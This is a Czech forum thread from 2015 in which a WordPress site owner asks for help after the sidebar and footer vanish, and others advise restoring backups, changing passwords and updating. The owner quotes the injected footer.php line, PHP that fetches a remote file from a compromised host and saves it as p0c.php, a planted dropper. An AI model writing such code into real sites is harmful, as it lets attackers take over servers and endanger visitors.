logo
26.08.2015 18:05
1
Dobrý den,

nevím jak se to mohlo stát, ale na webu mi zmizel celý sidebar s widgety a nyní jsem si všiml, že i patička. V Editoru jsem koukal na footer a je tam odkaz na nějakou zavirovanou stránku. Nechápu jak se tam něco takového mohlo stát.

obsah - Sidebar.php
<?php if (function_exists('dynamic_sidebar') && dynamic_sidebar(1)):?>
<?php endif; ?>

Obsah footer.php
<?php if(file_put_contents("p0c.php", file_get_contents('http://pprn.pl//wp-content/plugins/add-to-facebook-plugin/o.txt'))){echo"<!--r0x-->";}else{echo"no";}?>

ve footeru jsem zkoušel kliknout na tu adresu co tam je (to pprn.pl...) a můj antivirus se mohl zbláznit, tak na to prosím kdyžtak neklikejte!

Mohl by mi prosím někdo poradit?

Mimochodem jedná se o web Hardstyles.cz

Zkopírované věci z footer.php a sidebar.php jsou všechny, nic víc tam není, jen těhle pár řádků.

Co se právě děje na Webtrhu?

26.08.2015 18:22
2
Zapráskaný web (děravé pluginy, template..), nebo také třeba mallware v počítači (měl jsem tak věčně najebaný javascript v phpBB). Doporučuji stáhnout všechny soubory do počítače, a na server nahrát čisté zálohy. Zda v zálohách nemáš toto svinstvo můžeš zkusit projet třeba totalcommanderem (Příkaz > hledat) a prohledáš zálohu zda tam neodkazuješ na tu polskou stránku. V případě že zálohy nemáš, web bych uzavřel před veřejností aby google nezačal vyhodnocovat web jako nedůvěryhodný (osobně jsem u jednoho webu pak měl problém s překontrolováním). A následně se zaměřit na to, kudy se tam kód dostal, vyčistit to a opravit díry. Je to celé na docela rozsáhlé povídání, určitě o tom někdo i psal na nějakém blogu.
26.08.2015 18:22
3
Máš zálohu?
Pokud ano, tak nahraj zálohu, změň jméno uživatele a jeho heslo.
Změň heslo do FTP a také do databáze.
26.08.2015 18:27
4
No zálohu jsem nedělal, koukám že to byla chyba. Objevilo se to cca před 2ma dny.

Nešlo by třeba změnít jen ten obsah toho .php souboru?? Jsem v tomhle laik takže tomu fakt moc nerozumím. Přidal se ted jeden redaktor co tam píše, tak zkusím i jeho.
26.08.2015 18:28
5
Nepomůže jen změna těch souborů.
Jelikož někudy se tam musel útočník dostat a dostane se tam znovu.
Zkus, zdali hosting nemá zálohu.
Také aktualizuj na nejnovější wordpress.
Odinstaluj šablony a pluginy, které si nelegálně stáhl a využívej pluginy a šablony jen z wordpress.org a nebo zakoupené.
26.08.2015 18:31
6
Původně odeslal peeeeta
Nepomůže jen změna těch souborů.
Jelikož někudy se tam musel útočník dostat a dostane se tam znovu.
Zkus, zdali hosting nemá zálohu.
Také aktualizuj na nejnovější wordpress.
Odinstaluj šablony a pluginy, které si nelegálně stáhl a využívej pluginy a šablony jen z wordpress.org a nebo zakoupené.
Ty pluginy jsou stáhnuté z wordpress.org, přes klasickou instalaci pluginů. Šablona také, jen je popravená. A myslím, že nejnovější WP mám také. Mrknu na ten hosting
26.08.2015 18:43
7
Také je dobré, koukat, zdali jsou ty pluginy pravidelně aktualizované.
Také zdali ta úprava šablony je udělaná dobře.
WordPress jistě nejnovější není. Máš 4.2.2 už je 4.3 .
Pokud využíváš totalcomander a máš uložené heslo k FTP, tak je největší problém ta,. Také bych projel PC na viry a malware.
Nejdůležitější je mít zálohu, aktuální web (pluginy,CMS a šablony) a také najít díru a tu nejdříve eliminovat.
Máš zavirovaný jenom tento web, nebo jich máš víc, třeba na "multihostingu" u wedosu?
26.08.2015 18:48
8
Nn, mám pouze tento web.

Mě to žádnou aktualizaci neukazuje, ale zkusím to aktualizovat.

Co se tyce toho FTP atp na to mám svého programátora ale ten je někde pryč proto píšu zde, takže v tom ted trochu lítám :) Pc mám projetej, nic mi to nenašlo.
TC propojený s FTP nemám. Jak říkám, starám se o vse na webu ale co se tyce programování, FTP a dalších věcí, to nedělám já :/

---------- Příspěvek doplněn 26.08.2015 v 18:50 ----------

Aktualizaci na novou verzi mi to vůbec nenabízí :/
26.08.2015 18:52
9
Tak potom, zdali programátor nemá zavirovaný PC a nebo propojený TC s FTP.
Aktualizaci si můžeš i vynutit na hlavní stránce, po zkontrolování aktualizací.
Ty nemáš kontakt na svého programátora a je to programátor, který rozumí své práci a nebo je to jen nějaký kamarád, který občas něco naprogramuje?
Osobně bych kontaktoval jeho, pokud on dělá s webem.
26.08.2015 18:54
10
Právě že jsem ho již kontaktoval, ale neuspěšně. Alespon vypnout ten web.

Na hlavní stránce jsem to právě zkoušil, dáva jsem i Zkontrolovat znovu a neukazuje mi to zadnou novou aktualizaci.

Kontakt na něj mám ale nereaguje, buˇˇd je pryč nebo nevím.
26.08.2015 19:02
11
No tak že "programátor".
No tak udělej aktualizaci ručně, ale napřed je potřeba odvirovat web.
Nejlépe ze zálohy, ale ta musí být nezasažená. Pak změň ty údaje na FTP, MySQL a hesla a jména pro uživatele, aspoň s vyššími právy.
Také by se hodil seznam pluginů a šablon, které jsou nainstalované.

Ruční aktualizace se dělá snadno:

Stáhneš si instalačku wordpressu a přepíšeš s ní všechny soubory, které máš na webu.
26.08.2015 19:28
12
Jak řekl kolega. Jinak nám sem nahoď výčet používaných pluginů a šablon.
26.08.2015 20:27
13
vzdyt to mate diravy jako krava. prastara verze WP 4.2.3 s uplne nejhorsi chybou.. urcite se to da odvirovat a zabezpecit.. klidne napiste pres PM..
18.09.2015 08:34
14
vyreseno..

1/ smazane sablony rekonstruovany
2/ web odvirovan a zabezpecen..